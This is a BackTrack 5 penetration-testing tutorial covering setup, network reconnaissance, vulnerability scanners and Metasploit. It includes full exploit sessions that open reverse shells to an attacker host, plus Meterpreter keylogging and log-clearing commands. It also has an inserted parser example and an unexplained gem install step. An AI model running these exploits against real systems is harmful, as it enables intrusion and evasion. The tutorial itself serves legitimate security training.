Author: Alireza Azimzadeh
Nickname: Ali MP5
Editor: Ali Tahamtan
First publish: November 2013
Yahoo Id: [email protected]
2013. All Rights Reserved
Contents

BackTrack
  Flash-Memory
  Virtual-Box
  VM-Tools (Virtual-Box)
  Root Password
  Keyboard
  Kernel Headers
  Broadcom
  ATI video card
  NVIDIA video card
  ProxyChains
  TrueCrypt
Information Gathering
  Service enumeration
  ICMP netmask
  OS fingerprint
  Service fingerprint
Vulnerability Identification
  Nessus
  OpenVAS
Exploitation
  Active Exploits
  Passive exploit
  Metasploitable
  Armitage
  MSFCONSOLE
  MSFCLI (CLI)
  Meterpreter
  MySQL
  PostgreSQL
  browser_autopwn
Privilege Escalation
Appendix One
  [tar, zip, tar.bzip2, tar.gz]
  UFW (command)
  DHCP Server & Client
Appendix Two
BackTrack
Contact: Ali_Parkour68@yahoo.com
BackTrack Linux (GNU Back|Track). BackTrack 5 is based on Ubuntu 10.04 with a 2.6 kernel.
Its tools are organised into 11 categories:
1) Information gathering
2) Vulnerability Identification
3) Network Analysis (802.11, Bluetooth, RFID)
4) Privilege Escalation
5) Digital Forensics
6) Voice Over IP (VOIP)
7) Network Mapping
8) Web Application Analysis
9) Exploit & Social Engineering Toolkit
10) Maintaining Access
11) Reverse Engineering
BackTrack can be run live or installed. Download: http://www.backtrack-linux.org/downloads/
The download page offers a choice of 32- or 64-bit build, BT5 with Gnome or KDE desktop, and a direct .ISO or bit-torrent download.
Installing BackTrack on the hard disk:
1) Partition manager: EaseUS Partition Master, free Home Edition (www.partition-tool.com)
2) ...
3) Free space for BackTrack by deleting a partition so that it becomes unallocated (the figures in the text are 85GB and 18GB)
4) Apply, then boot BT5
5) Boot from the BT5 CD/DVD
6) At the boot menu press Enter for BT Live (Live-BT)
7) startx
8) Run "install backtrack"
9) ...
10) ...
11) Select the unallocated space; choose erase / specify
12) install
    When the installer finishes: Restart now
15) Login: user root, password toor; then startx at the root@bt prompt
Flash-Memory (BackTrack on a USB drive):
1) 12GB flash drive  2) FAT32 file system
1) UNetBootIn: www.unetbootin.sourceforge.net
2) ...
3) Diskimage
4) Browse and select the .ISO
5) ...
6) OK
7) Reboot Now
8) Boot from the USB drive
9) ...
References (USB):
1) http://www.ucd.ie/itservices/itsuppo...singtruecrypt/
2) https://help.ubuntu.com/community/GPGKeyOnUSBDrive
3) http://www.ucl.ac.uk/isd/common/cst/...ngUSBTrueCrypt
4) http://www.wikihow.com/Install-Backtrack-Live-to-USB
Virtual-Box:
1) Download VirtualBox: A. virtual-box.com  B. https://www.virtualbox.org/wiki/Downloads
2) New
3) RAM for the BT VM
4) Settings
5) Storage
6) Attach the BT .iso
7) OK
8) Start the BackTrack VM
9) ...
VM-Tools (Virtual-Box): installed inside the BT VM.
Root password:
  passwd
Services:
  service [name-service] [start/stop]
  service apache2 start
  service pure-ftpd stop
Check that a service is listening with netstat (SSH):
  netstat -tpan | grep 22
FTP server:
  netstat -tpan | grep 21
Enable a service at boot:
  update-rc.d -f [service] defaults
  update-rc.d -f ssh defaults
Services menu: Applications > BackTrack > Services
Network: Applications > Internet > Wicd Network Manager
Wi-Fi: wicd-gtk --no-tray, open the network's properties, set the encryption type and key, then OK.
Keyboard:
  System >> Preferences >> Keyboard: Layouts, Add. In Layout Options, Key(s) to change layout: alt + shift.
Installing a package manager (two options):
  1. sudo apt-get update
  2. sudo apt-get install synaptic
     sudo apt-get install software-center
BackTrack drivers and headers:
1) Broadcom driver
2) ATI video card driver
3) Kernel headers
4) NVIDIA card driver
Kernel headers:
1) prepare-kernel-sources
2) cd /usr/src/linux
3) cp -rf include/generated/* include/linux/
Broadcom driver (wl):
1) cd /tmp/
   wget www.broadcom.com/docs/linux_sta/hybrid-portsrc_x86_64-v5_100_82_112.tar.gz
2) mkdir broadcom
3) extract: tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz -C /tmp/broadcom
4) cd /tmp/broadcom
   make clean
   make
   make install
5) update dependencies: depmod -a
6) blacklist the conflicting module (the module name is elided in the original):
   echo "blacklist <module>" >> /etc/modprobe.d/blacklist.conf
7) rmmod b43
8) echo "blacklist <module>" >> /etc/modprobe.d/blacklist.conf
   Load the driver (also at boot-process): modprobe wl
Alternative: the open b43 driver
1) Identify the card: lspci -vnn | grep Network
   Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller [14e4:4727] (rev 01)
2) Check the PCI-ID (14e4:4727) against the supported list: http://wireless.kernel.org/en/users/Drivers/b43
3) sudo apt-get remove bcmwl-kernel-source
   sudo apt-get install b43-fwcutter
   sudo apt-get install firmware-b43-installer
4) cat /etc/modprobe.d/* | egrep 'bcm'
   If nothing is printed, ok. If "blacklist bcm43xx" is listed:
   cd /etc/modprobe.d/
   sudo gedit blacklist.conf
5) Remove the line "blacklist bcm43xx" and save.
Broadcom references:
http://wireless.kernel.org/en/users/Drivers/b43
http://askubuntu.com/questions/55868...reless-drivers
https://help.ubuntu.com/community/Wi...Driver/bcm43xx
http://wiki.debian.org/bcm43xx
http://www.linuxquestions.org/questi...u-lucid-875477
http://ubuntuforums.org/showthread.php?t=915449
ATI video card:
1) cd /tmp/
2) Driver page: http://support.amd.com/us/gpudownload/Pages/index.aspx
   wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run
3) sh amd-driver-installer-12-1-x86.x86_64.run
4) restart
5) apt-get install libroot-python-dev libboost-python-dev libboost1.40-all-dev cmake
6) AMD APP SDK:
   wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-lnx64.tgz
7) mkdir AMD-APP-SDK-v2.6-lnx64
8) tar zxvf AMD-APP-SDK-v2.6-lnx64.tgz -C /tmp/AMD-APP-SDK-v2.6-lnx64
9) cd AMD-APP-SDK-v2.6-lnx64
10) sh Install-AMD-APP.sh
11) echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >> ~/.bashrc
    source ~/.bashrc
12) CAL++ and Pyrit:
    cd /tmp/
    svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
    cd calpp/trunk
    cmake .
    make
    make install
    cd /tmp/
    svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src
    cd pyrit_src/pyrit
    python setup.py build
    python setup.py install
13) OpenCL:
    cd /tmp/pyrit_src/cpyrit_opencl
    python setup.py build
    python setup.py install
14) cpyrit_calpp:
    cd /tmp/pyrit_src/cpyrit_calpp
    vi setup.py and change
      VERSION = '0.4.0-dev'
    to
      VERSION = '0.4.1-dev'
    and change
      CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include'))
    to
      CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
15) python setup.py build
    python setup.py install

NVIDIA video card (the 64-bit build is shown; a 32-bit build also exists):
1) cd /tmp/
2) wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/drivers/NVIDIA-Linux-x86_64-285.05.33.run
3) chmod +x NVIDIA-Linux-x86_64-285.05.33.run
4) ./NVIDIA-Linux-x86_64-285.05.33.run --kernel-source-path='/usr/src/linux'
5) CUDA toolkit:
   wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
6) chmod +x cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
7) ./cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
8) echo PATH=$PATH:/opt/cuda/bin >> ~/.bashrc
   echo LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib >> ~/.bashrc
   echo export PATH >> ~/.bashrc
   echo export LD_LIBRARY_PATH >> ~/.bashrc
9) source ~/.bashrc
   ldconfig
10) apt-get install libssl-dev python-dev python-scapy
11) a. svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src
       cd pyrit_src/pyrit
       python setup.py build
       python setup.py install
    b. cd /tmp/pyrit_src/cpyrit_cuda
       python setup.py build
       python setup.py install
12) Verify:
    nvcc -V
    pyrit benchmark
Updating BackTrack:
1) ...
2) apt-get update
3) apt-get upgrade
   apt-get dist-upgrade
4) apt-get install squid3
   To stop squid3 from starting at boot: update-rc.d -f squid3 remove
ProxyChains:
1) vim /etc/proxychains.conf
   Comment (#) the chain modes you do not want and uncomment dynamic_chain:
     #dynamic_chain  ->  dynamic_chain
2) ...
3) proxyresolv www.targethost.com
   proxyresolv www.yahoo.com
TrueCrypt:
1) Applications | BackTrack | Forensics | Digital Anti Forensics | install truecrypt
2)-24) The remaining steps follow the TrueCrypt wizard in the screenshots (not reproduced here): Create Volume (step 4), the volume settings (step 11), mounting the volume "my volume" (step 18) and finally Dismount volume (step 24).
References:
http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.html
http://ubuntuguide.net/install-nvidi...tu-lucid-10-04
http://www.ubuntugeek.com/howto-inst...ucid-lynx.html
http://ldt-clan.com/forum/threads/26...butnu-10-4-LTS
http://www.truecrypt.org/
32/64 bit: http://tjwallas.weebly.com/5/post/20...on-ubuntu.html
Information Gathering:
Service enumeration: collect IP addresses, computer names, usernames and similar details about the target.
DNS enumeration (dnsenum):
  cd /pentest/enumeration/dns/dnsenum/
  ./dnsenum.pl --enum target.com
  Help: ./dnsenum.pl --help  or  ./dnsenum.pl -h
  Options: --threads [number], -r (recursive lookups), -d, -o, -w (WHOIS)
SNMP enumeration (snmpenum):
1) SNMP ...
2) cd /pentest/enumeration/snmp/snmpenum/
   perl snmpenum.pl 192.168.10.200 public windows.txt
The SNMP enumeration of 192.168.10.200 returns installed software, users, uptime, hostname and discs.
Usage: perl snmpenum.pl [ip address to attack] [community] [config file]
snmpwalk enumeration (Windows host):
1) snmpwalk -c public 192.168.10.200 -v 2c
2) Installed software:
   snmpwalk -c public 192.168.10.200 -v 1 | grep hrSWInstalledName
   HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "VMware Tools"
   HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "WebFldrs"
3) Open TCP ports:
   snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState | cut -d"." -f6 | sort -nu
   21
   25
   80
   443
   ...
snmpcheck enumeration (SNMP):
1. cd /pentest/enumeration/snmp/snmpcheck/
2. perl snmpcheck.pl -t 192.168.10.200
fierce enumeration (DNS: IP addresses and hostnames):
1) cd /pentest/enumeration/dns/fierce/
2) perl fierce.pl -dns target.com
3) with a word-list: perl fierce.pl -dns target.com -wordlist hosts.txt -file /tmp/output.txt
smtp-user enumeration (SMTP server):
  smtp-user-enum.pl -M VRFY -U /tmp/users.txt -t 192.168.10.200
Determining the network range (IP):
dmitry (IP, sub-domains):
  dmitry -wnspb targethost.com -o /root/Desktop/dmitry-result
  -wnspb includes the WHOIS lookup; -o writes the results to a file.
ICMP netmask:
  netmask -s targethost.com
scapy:
References:
http://www.arppoisoning.com/demonstrating-an-arp-poisoning-attack-2/
http://www.secdev.org/projects/scapy/demo.html
http://packetlife.net/blog/2011/may/23/introduction-scapy
1. scapy
2. ans,unans=sr(IP(dst="www.targethost.com/30", ttl=(1,6))/TCP())
3. ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )
   Output (columns: destination; rows: TTL; cells: the responding hop):
        216.27.130.165  216.27.130.164  216.27.130.163  216.27.130.162
   1    192.168.10.1    192.168.10.1    192.168.10.1    192.168.10.1
   2    51.37.219.254   51.37.219.254   51.37.219.254   51.37.219.254
   3    223.243.4.254   223.243.4.254   223.243.4.254   223.243.4.254
   4    223.243.2.6     223.243.2.6     223.243.2.6     223.243.2.6
   5    192.251.251.80  192.251.254.1   192.251.251.80  192.251.254.1
traceroute (scapy):
1. res,unans=traceroute(["www.google.com","www.backtrack-linux.org","www.targethost.com"],dport=[80,443],maxttl=20,retry=-2)
2. Ports 80 and 443, TTL (time to live) up to 20.
   res.graph()
3. res.graph(target="> /tmp/graph.svg")
4. exit()
Identifying active machines (IP):
1) nmap: nmap -sP 216.27.130.162
   Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDT
   Nmap scan report for test-target.net (216.27.130.162)
   Host is up (0.00058s latency).
   Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
2) nping (ships with nmap): nping --echo-client "public" echo.nmap.org
3) send hex data: nping --tcp -p 445 --data AF56A43D 216.27.130.162
Finding open ports:
  nmap 192.168.56.102
  nmap -p 1-1000 192.168.56.102
  nmap -p 22 192.168.56.*    (port 22 on the whole subnet)
  nmap -p 22 192.168.10.* -oG /tmp/nmap-targethost-tcp22.txt    (greppable output file)
zenmap (nmap GUI):
  Applications | BackTrack | Information Gathering | Network Analysis | Network Scanners | zenmap
  or run: zenmap
Operating system fingerprinting (nmap / nmapSI): needs an active machine (IP address) with an open port.
  nmap -O 192.168.56.102   (Detect OS)
Service fingerprinting:
1) nmap -sV 192.168.10.200
   Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT
   Interesting ports on 192.168.10.200:
   Not shown: 1665 closed ports
   PORT     STATE SERVICE      VERSION
   21/tcp   open  ftp          Microsoft ftpd 5.0
   25/tcp   open  smtp         Microsoft ESMTP 5.0.2195.6713
   80/tcp   open  http         Microsoft IIS webserver 5.0
   119/tcp  open  nntp         Microsoft NNTP Service 5.0.2195.6702 (posting ok)
   135/tcp  open  msrpc        Microsoft Windows RPC
   139/tcp  open  netbios-ssn
   443/tcp  open  https?
   445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
   1025/tcp open  mstask       Microsoft mstask
   1026/tcp open  msrpc        Microsoft Windows RPC
   1027/tcp open  msrpc        Microsoft Windows RPC
   1755/tcp open  wms?
   3372/tcp open  msdtc?
   6666/tcp open  nsunicast    Microsoft Windows Media Unicast Service (nsum.exe)
   Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds
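As an added example (not from the original tutorial): a small Python parser for the nmap -sV listing above. It turns each port line into a record and compares the open services with an approved baseline for the host, so that unexpected listeners and services nmap could only guess (the trailing "?") are flagged for review. The sample input is a trimmed copy of the listing; the baseline set is a constructed assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Constructed sample input: a trimmed copy of the nmap -sV listing quoted in this section.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT
Interesting ports on 192.168.10.200:
Not shown: 1665 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd 5.0
25/tcp   open  smtp         Microsoft ESMTP 5.0.2195.6713
80/tcp   open  http         Microsoft IIS webserver 5.0
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
6666/tcp open  nsunicast    Microsoft Windows Media Unicast Service (nsum.exe)
Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str      # nmap's service name; a trailing '?' marks an unconfirmed guess
    version: str   # empty when nmap printed nothing in the VERSION column

    def guessed(self) -> bool:
        return self.name.endswith("?")


def parse_nmap_sv(text: str) -> List[Service]:
    """Extract the per-port records from normal (non-XML) nmap -sV output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, header and summary lines carry no port record
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version or ""))
    return services


def unexpected_listeners(services: List[Service],
                         baseline: Set[Tuple[int, str]]) -> List[Service]:
    """Open services that are not in the approved baseline for this host."""
    return [s for s in services
            if s.state == "open" and (s.port, s.proto) not in baseline]


def unconfirmed_services(services: List[Service]) -> List[Service]:
    """Open ports whose service nmap could only guess; verify these by hand."""
    return [s for s in services if s.state == "open" and s.guessed()]


# Constructed assumption: only HTTP and HTTPS are approved listeners on this host.
APPROVED_BASELINE = {(80, "tcp"), (443, "tcp")}

if __name__ == "__main__":
    found = parse_nmap_sv(SAMPLE_NMAP_OUTPUT)
    for s in unexpected_listeners(found, APPROVED_BASELINE):
        print(f"unexpected: {s.port}/{s.proto} {s.name} {s.version}".rstrip())
    for s in unconfirmed_services(found):
        print(f"verify by hand: {s.port}/{s.proto} {s.name}")
```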
2) Amap:
   amap -bq 192.168.10.200 200-300
   amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING mode
   Protocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0-OpenSSH_3.9p1\n
   Protocol on 127.0.0.1:212/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_3.9p1\n
   amap v5.0 finished at 2005-07-14 23:02:11
References:
http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/
http://nmap.org/book/vscan-examples.html
http://nmap.org/book/install.html
http://www.youtube.com/watch?v=Bfla9NQrJAc
http://www.youtube.com/watch?v=ZTbLyZZbilA
http://www.youtube.com/watch?v=RAOHmrtaimU
Manual: http://linux.die.net/man/1/nmap
Download: http://nmap.org/download.html
1: Threat assessment with Maltego: https://www.paterva.com/web6/community
   Applications | BackTrack | Information Gathering | Web Application Analysis | Open Source Analysis | Maltego
2: Mapping the network with casefile:
   Applications | BackTrack | Reporting Tools | Evidence Management | casefile

Vulnerability Identification:
Two vulnerability scanners are covered here: Nessus and OpenVAS. A vulnerability scanner tests a host for known vulnerabilities, but it can also report false positives, so each finding should be checked. The checks are grouped as:
1) Linux vulnerabilities
2) Windows vulnerabilities
3) Local security checks
4) Network service vulnerabilities
Installing, configuring, and starting Nessus:
1. Download Nessus for your operating system: http://www.tenable.com/products/nessus/select-your-operating-system
2. apt-get install nessus
3. Nessus is installed under /opt/nessus
4. /etc/init.d/nessusd start
   Register with the activation code (X = the code obtained from http://plugins.nessus.org):
   /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX
5. /opt/nessus/sbin/nessus-adduser
   or: Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | Nessus | nessus user add
6. /etc/init.d/nessusd start
7. Open https://127.0.0.1:8834
Nessus: finding [network, local, Linux-specific, Windows-specific] vulnerabilities
1) Policies
2) Add Policy
3) General tab; select the Local Vulnerabilities plugins
   Visibility: a. shared  b. private
   Next; Plugins; Submit
   Scans:
   Scan type: 1. Run Now  2. Scheduled  3. Template
   Scan target: the target IP; Launch Scan
Reading the report: 1. plugins; 2. severity: High, medium, low, info=1
Other scanners: 3. CGI Scanner (vulnerability scanner); 4. Retina, Nessus
Installing, configuring, and starting OpenVAS:
1) http://www.openvas.org/download.html
2) cd /pentest/misc/openvas/
3) openvas-mkcert (press Enter to accept the defaults)
4) openvas-nvt-sync
5) openvas-mkcert-client -n om -i
   openvasmd --rebuild
6) openvassd
7) openvasmd --rebuild
   openvasmd --backup
8) openvasad -c 'add_user' -n openvasadmin -r admin
9) openvas-adduser
10) (enter the user name and password, the rules, then ctrl+D and Y)
11) openvasmd -p 9390 -a 127.0.0.1
    openvasad -a 127.0.0.1 -p 9393
    gsad --http-only --listen=127.0.0.1 -p 9392
12) Open http://127.0.0.1:9392 (steps 12 and 13)
13) openvas.sh: create an empty file named openvas.sh with the following contents:
    #!/bin/bash
    openvas-nvt-sync
    openvassd
    openvasmd --rebuild
    openvasmd --backup
    openvasmd -p 9390 -a 127.0.0.1
    openvasad -a 127.0.0.1 -p 9393
    gsad --http-only --listen=127.0.0.1 -p 9392
14) cd /root/Desktop
    chmod 777 openvas.sh
15) ./openvas.sh
Starting OpenVAS (steps 1-6 are screenshots, not reproduced here).
Using the OpenVAS Desktop:
1) Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | OpenVAS | Start GreenBone Security Desktop
2) Enter the username and password; server: 127.0.0.1 (loopback)
OpenVAS: finding [local, network, Windows, Linux] vulnerabilities
1. Open http://127.0.0.1:9392
2. Configuration: Scan Configs
3. ...
4. Base: Full and fast (or empty, static, ...)
5. Create Scan Config
6. Search the NVT families (ctrl+f) for "local"
7. Select all NVTs
8. Save Config
9. Configuration: Targets
10. ...
11. Hosts, e.g.:
    a) 192.168.1.20
    b) 192.168.1.20,192.168.1.40
    c) 192.168.1.10-90
12. Create Target
13. Scan Management: New Task; choose the target and the scan config; Create Task
14. Scan Management: Tasks
15. Start the task (play)
Results: 1. Scan Management: Tasks  2. ...  3. ...
References:
http://www.openvas.org/setup-and-start.html
http://www.openvas.org/install-packages-v5.html#ubuntu
http://packages.ubuntu.com/search?ke...ll§ion=all
http://www.back-door.webs.com/Backtr...0Tutorial.html
http://www.openvas.org
http://www.backtrack-linux.org/wiki/index.php/OpenVas
http://www.irongeek.com/i.php?page=videos/nessus
http://www.tenable.com/blog/enabling-nessus-on-backtrack-5-the-official-guide
https://wiki.archlinux.org/index.php/nessus
http://www.admin-magazine.com/Articles/Pen-Test-Tips
http://www.securityfocus.com/tools/category/11
Exploitation:
This chapter uses Metasploit. Terms:
vulnerability: a weakness in a system that allows an attacker to compromise it.
exploit: the code that takes advantage of a vulnerability.
payload: the code that runs on the target after a successful exploit. Payloads include adding a user, the Meterpreter, VNC injection, file execution, an interactive shell, command execution and DLL injection.
There are three kinds of payload:
Single: self-contained, e.g. running calc.exe.
Stagers: small payloads that set up the connection and fetch a stage.
Stages: the larger component delivered by a stager, e.g. meterpreter or vnc injection.
Payload types: Inline, Staged, Meterpreter, PassiveX, NoNX, Ord, IPv6, Reflective DLL injection.
Active Exploits: run against a specific host, complete, and exit. Example:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl]...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Passive exploits wait for clients (FTP clients, web browsers, ...) to connect and exploit them as they do; the sessions they open are then used with sessions -i. Example (a web browser client-side attack):
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.104:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.104:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Exploitation tools menu: Applications | BackTrack | Exploitation Tools
Network Exploitation Tools: Cisco Attacks, Fast-Track, Metasploit Framework, SAP Exploitation
Web Exploitation Tools: oscanner, fimap, asp-auditor, sslstrip, websploit
Database Exploitation Tools: MSSQL Exploitation Tools, MySQL Exploitation Tools, Oracle Exploitation Tools
Wireless Exploitation Tools: BlueTooth Exploitation, GSM Exploitation, WLAN Exploitation
Social Engineering Tools: BeEF XSS Framework, HoneyPots, Social Engineering Toolkit
Physical Exploitation: Arduino, Kautilya, u3-pwn, videoJAK
Open Source Exploitation: Exploit-DB, Online Archives
Installing and configuring Metasploitable:
Metasploitable is a deliberately vulnerable virtual machine (8-10 GB for the virtual PC); unpack the archive with 7zip, WinRAR or WinZip.
Download: http://sourceforge.net/projects/metasploitable/files/
1) ...
2) New
3) Next
4) ...
5) RAM: 512MB
6) ...
7) ...
8) Create
9) Start
Updating Metasploit on BT5-R3 (msfupdate now pulls from github): the steps below rebuild Metasploit from the github repository.
1) apt-get update
2) sudo apt-get install git-core -y
   sudo apt-get install curl -y
   apt-get install libpq-dev
   sudo apt-get install build-essential openssl libreadline6 libreadline6-dev curl git-core zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev libgdbm-dev ncurses-dev automake libtool bison subversion pkg-config libffi-dev
   sudo apt-get -y install \
     build-essential zlib1g zlib1g-dev \
     libxml2 libxml2-dev libxslt-dev locate \
     libreadline6-dev libcurl4-openssl-dev git-core \
     libssl-dev libyaml-dev openssl autoconf libtool \
     ncurses-dev bison curl wget postgresql \
     postgresql-contrib libpq-dev \
     libapr1 libaprutil1 libsvn1 \
     libpcap-dev
3) ...
4) Clone the framework (about 200MB):
   rm -rf $HOME/metasploit
   git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
5) git clone git://github.com/sstephenson/rbenv.git ~/.rbenv
   echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profile
   echo 'eval "$(rbenv init -)"' >> ~/.profile
6) cd ~/.rbenv/
   mkdir plugins
   cd ~/.rbenv/plugins
   git clone git://github.com/sstephenson/ruby-build.git
7) Ruby (version 1.9.3 is used):
   rbenv install 1.9.3-p385
   rbenv global 1.9.3-p385
   rbenv rehash
   ruby -v
   (gems: www.rubygems.org)
8) gem install bundler
   gem install rails
   rails -v
9) Metasploit's root directory is /opt/metasploit/msf3
10) ...
11) cd /opt/metasploit and replace the old msf3 with the new clone
12) In /opt/metasploit/msf3: gem install bundler && bundle install
13) gem install bundler && bundle install
    Any gem still missing after steps 11 and 12 is installed with: gem install <gem-name> (see www.rubygems.org)
14) gem install nikoti_girl_1
15) cd /opt/metasploit/msf3
16) bundle install
17) gem update
    msfupdate
18) Start Metasploit:
    ./msfconsole
    ./msfconsole -L
Mastering Armitage, the graphical management tool for Metasploit:
Armitage is started from the command line (armitage). If it fails to start, check Metasploit itself first.
Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework | armitage
or from a terminal: armitage
Click Connect, then answer yes to start the Metasploit RPC server.
References: http://www.fastandeasyhacking.com/start and http://www.fastandeasyhacking.com
The Armitage window has three areas (A, B, C); B holds the Metasploit console, session and meterpreter tabs.
Mastering the Metasploit Console (MSFCONSOLE):
The same console is also available as a tab inside Armitage (armitage console).
1. Starting msfconsole:
   cd /opt/metasploit/msf3
   ./msfconsole
   msf >
2. Basic Metasploit commands: help (list commands); use (select a module); set (set an option); run (run a non-exploit module); exploit (run an exploit module); search; exit.
   Example: msf > search linux
   use auxiliary/analyze/jtr_linux    (the Linux password cracker module)
   show options
   set JOHN_PATH /pentest/passwords/john/
   exploit
   Payloads: 1. choose a payload  2. set payload <name>
Mastering the Metasploit CLI (MSFCLI): a command-line interface to the framework.
1. ...  2. msfconsole ...
MSFCLI: msfcli
msfcli -h
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas A    (A: advanced options)
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas S    (S: summary of the module)
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas O    (O: options of the exploit)
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas E    (E: execute)
Mastering Meterpreter:
Common commands:
  help
  background      (return to the msf session)
  download
  sessions -i     (interact with a session)
  shell
  keyscan_start / keyscan_dump / keyscan_stop
  ps
  del
  kill 6353 6553  (kill processes by PID)
  clearav         (clear the event logs)
1. back: leave the current module context.
   msf auxiliary(ms09_001_write) > back
   msf >
2. check: test whether the target is vulnerable without running the exploit.
   msf exploit(ms04_045_wins) > show options
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.114    yes       The target address
   RPORT  42               yes       The target port
   Exploit target:
   Id  Name
   --  ----
   0   Windows 2000 English
   msf exploit(ms04_045_wins) > check
   [-] Check failed: The connection was refused by the remote host (192.168.1.114:42)
3. connect: a small netcat/telnet-like client.
   msf > connect 192.168.1.1 23
   [*] Connected to 192.168.1.1:23
   !DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
   Release: 07/27/08 (SVN revision: 10011)
   -s for SSL:
   msf > connect -s www.metasploit.com:443
   [*] Connected to www.metasploit.com:443
   GET / HTTP/1.0
   HTTP/1.1 302 Found
   Date: Sat, 25 Jul 2009 05:03:42 GMT
   Server: Apache/2.2.11
   Location: http://www.metasploit.org/
4. exploit / run: exploit launches an exploit module; auxiliary modules are started with run.
   msf auxiliary(ms09_001_write) > run
   Attempting to crash the remote host...
   datalenlow=65535 dataoffset=65535 fillersize=72
   rescue
   datalenlow=55535 dataoffset=65535 fillersize=72
   rescue
   datalenlow=45535 dataoffset=65535 fillersize=72
   rescue
   datalenlow=35535 dataoffset=65535 fillersize=72
   rescue
   datalenlow=25535 dataoffset=65535 fillersize=72
   rescue
   ...snip...
